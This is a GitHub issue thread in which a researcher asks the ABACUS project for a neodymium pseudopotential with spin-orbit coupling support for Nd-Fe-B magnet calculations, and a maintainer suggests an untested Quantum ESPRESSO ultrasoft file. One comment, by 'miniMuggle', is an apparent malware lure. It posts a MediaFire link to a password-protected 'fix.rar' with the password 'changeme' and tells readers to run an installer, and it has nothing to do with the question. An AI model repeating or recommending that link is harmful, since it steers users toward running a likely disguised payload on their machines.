### ISSUE TITLE
Need Nd pseudopotential supporting SOC calculation

### ISSUE THREAD

**Issue by zhubro321** [deepmodeling/abacus-develop#5008]
### Background

The study of the magnetic properties of Nd-Fe-B permanent magnet materials is of great importance to modern society, as they facilitate efficient energy conversion and high-performance applications in a range of fields, including electric transportation, consumer electronics, industrial automation, defence, and aerospace.
It is therefore evident that a profound comprehension and enhancement of their magnetic characteristics is of paramount importance for the advancement of innovation in these domains and the optimisation of resource utilisation efficiency.

### Describe the solution you'd like

I would like to study the magnetic properties and electronic structure of Nd-Fe-B permanent magnet material system. Currently, my main focus is on DFT calculations of its main phase Nd2Fe14B structure. In the future, I may also investigate issues related to magnetic anisotropy. For Nd, it is necessary to consider the SOC effect. SOC is usually significant in Nd elements, affecting their electronic structure and magnetic behavior. Therefore, it is important to consider SOC for Nd elements when studying Nd-Fe-B systems. However, the official website currently does not provide a pseudopotential for Nd to support SOC effect calculations (relational='full ', has_sto='T')
Currently, the Dojo NC-FR mentioned on the official website contains pseudopotentials of Fe and B that can support SOC effect calculations, but not Nd.
**I hope there can be a Nd pseudopotential file based on plane waves that supports SOC effect calculation**

### Task list only for developers

- [ ] Notice possible changes of behavior
- [ ] Explain the changes of codes in core modules of ESolver, HSolver, ElecState, Hamilt, Operator or Psi

### Task list for Issue attackers (only for developers)

- [ ] Review and understand the proposed feature and its importance.
- [ ] Research on the existing solutions and relevant research articles/resources.
- [ ] Discuss with the team to evaluate the feasibility of implementing the feature.
- [ ] Create a design document outlining the proposed solution and implementation details.
- [ ] Get feedback from the team on the design document.
- [ ] Develop the feature following the agreed design.
- [ ] Write unit tests and integration tests for the feature.
- [ ] Update the documentation to include the new feature.
- [ ] Perform code review and address any issues.
- [ ] Merge the feature into the main branch.
- [ ] Monitor for any issues or bugs reported by users after the feature is released.
- [ ] Address any issues or bugs reported by users and continuously improve the feature.

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by kirk0830** [comment]
@zhubro321 Hi, for ABACUS now supports ultrasoft pseudopotential, you can try this: https://[pseudopotentials.quantum-espresso.org/upf_files/Nd.rel-pbe-spdn-rrkjus_psl.1.0.0.UPF](https://pseudopotentials.quantum-espresso.org/upf_files/Nd.rel-pbe-spdn-rrkjus_psl.1.0.0.UPF), but use with care because it is not tested by me.
